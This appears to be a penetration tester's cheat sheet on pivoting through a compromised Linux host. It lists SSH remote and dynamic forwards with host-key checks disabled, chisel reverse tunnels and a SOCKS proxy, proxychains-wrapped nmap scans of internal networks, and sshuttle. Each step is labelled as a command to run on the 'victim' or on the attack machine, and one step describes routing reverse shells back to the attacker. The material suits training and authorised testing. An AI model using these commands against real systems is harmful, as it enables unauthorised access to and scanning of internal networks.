In this case, we will ssh out to our Kali machine as the kali user ([email protected]), specify no commands (-N), and a remote forward (-R). We will open a listener on TCP port 2221 on our Kali machine (10.11.0.4:2221) and forward connections to the internal Linux machine’s TCP port 3306 (127.0.0.1:5555):
# On victim
ssh -N -R 192.168.119.145:2221:127.0.0.1:5555 [email protected]
sudo ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -N -R 192.168.145.52:2221:127.0.0.1:5555 [email protected]
127.0.0.1:80 [email protected] -p2222
ssh -N -R 192.168.119.145:5555:127.0.0.1:5555 [email protected]
Chisel
Expose single or multiple known ports from victim to attack machine
# on kali
chisel server -p 5000 -reverse
# on victim
chisel client <IP_ATTACK>:5000 R:<IP>:<PORT_TO_EXPOSE>:127.0.0.1:<FREE_PORT_ON_ATTACKER_MACHINE>
Forward connections from internal network back to the atttacker machine (e.g: Reverse shell from internal through proxy to attacker machine or enable to upload files through an HTTP server on the attacker machine)
# on kali
chisel server -p 5000
# on victim
chisel client <IP_ATTACK>:5000 <REV_SHELL_PORT>:<IP_ATTACK>:<LISTENING_PORT_ON_ATTACKER>
tunnel all incoming traffic to any host in the target network, through the compromised Linux machine, which we log into as student
# on attack
chisel server -p 5000 --socks5 --reverse
# Proxychains on attack
sock5 127.0.0.1 <PROXY_PORT>
# On victim
chisel client <IP_ATTACK>:5000 R:<PROXY_PORT>:socks
# We can then run command like
proxychains -q nmap -sT IP
Socks proxy to enable access to internal machines/ports
sudo ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -N -D 127.0.0.1:80 [email protected]
#cat /etc/proxychains.conf
socks5 127.0.0.1 8080
Then in Kali we can run command like
sudo proxychains nmap --top-ports=20 -sT -Pn 192.168.1.110
sshuttle
Go through 10.11.1.251 to reach network 10.3.3.0
sshuttle -r [email protected] 10.3.3.0/24